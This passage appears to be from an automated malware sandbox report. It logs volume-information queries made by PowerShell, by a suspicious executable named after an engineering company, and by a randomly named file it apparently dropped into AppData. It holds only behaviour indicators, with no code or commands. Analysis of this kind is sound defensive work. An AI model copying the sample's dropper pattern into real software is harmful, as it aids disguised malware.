Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Queries volume information: C:\Users\user\AppData\Roaming\RTUZKYTc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Queries volume information: C:\Users\user\AppData\Roaming\RTUZKYTc.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
